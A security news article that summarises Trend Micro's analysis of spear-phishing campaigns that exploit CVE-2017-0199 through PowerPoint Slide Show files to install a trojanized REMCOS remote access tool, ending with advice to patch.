CVE-2017-0199: Crooks exploit PowerPoint Slide Show files to deliver malware

According to Trend Micro, cyber criminals abuse the CVE-2017-0199 vulnerability to deliver malware via PowerPoint Slide Show.

In April Microsoft fixed the CVE-2017-0199  vulnerability in Office after threat actors had been exploiting it in the wild.

Hackers leveraged weaponized Rich Text File (RTF) documents exploiting a flaw in Office’s Object Linking and Embedding (OLE) interface to deliver malware such as the DRIDEX banking Trojan.

Now the same issue is being abused in a new way to infect computers with a remote access Trojan.

According to Trend Micro, the same flaw is abused to deliver malware via PowerPoint Slide Show.

“We recently observed a new sample (Detected by Trend Micro as TROJ_CVE20170199.JVU) exploiting CVE-2017-0199 using a new method that abuses PowerPoint Slide Show—the first time we have seen this approach used in the wild before.” reads the analysis published by Trend Micro. “As this is not the first time that CVE-2017-0199 was exploited for an attack, we thought it fitting to analyze this new attack method to provide some insight into how this vulnerability can be abused by other campaigns in the future.”

The weaponized document is delivered as an attachment to a spear-phishing messages that pretend to be sent by a business partner.

The email message is supposedly an order request that doesn’t include other business documents, instead, it has attached a malicious PowerPoint Show (PPSX file) that supposedly exploits the CVE-2017-8570. Experts believe that attackers leveraged this Microsoft Office vulnerability, likely for an error made by the toolkit developer.

Once the file has been executed, PowerPoint initializes the script moniker and launches the remote malicious payload via the PowerPoint Show animations feature by exploiting the Microsoft flaw perched in April. Then it downloads a file called logo.doc, which is instead an XML file with JavaScript code.

The JavaScript runs a PowerShell command to download and execute RATMAN.EXE from its command and control (C&C) server. The file is a Trojanized version of the legitimate  REMCOS remote access tool (RAT).

With this trick, attackers gain full access to the victim’s computer.

The tool leverages an unknown .NET protector to evade detection.

“Ultimately, the use of a new method of attack is a practical consideration; since most detection methods for CVE-2017-0199 focuses on the RTF method of attack, the use of a new vector—PPSX files—allows attackers to evade antivirus detection,” reads the analysis published by Trend Micro.

Trend Micro pointed out the importance of keeping software up to date and paying extra caution when opening documents delivered via spam email or clicking embedded links.

“Users should also always patch their systems with the latest security updates. Given that Microsoft already addressed this vulnerability back in April, users with updated patches are safe from these attacks,” the security researchers also note.

[adrotate banner=”9″] [adrotate banner=”12″]

Pierluigi Paganini

(Security Affairs –  Malware, PowerPoint Slide Show)

[adrotate banner=”5″]

[adrotate banner=”13″]

Pierluigi Paganini: Pierluigi Paganini is member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and Cyber G7 Group, he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years experience in the field, he is Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to find the security blog "Security Affairs" recently named a Top National Security Resource for US. Pierluigi is a member of the "The Hacker News" team and he is a writer for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and for many other Security magazines. Author of the Books "The Deep Dark Web" and “Digital Virtual Currency and Bitcoin”.

This website uses cookies.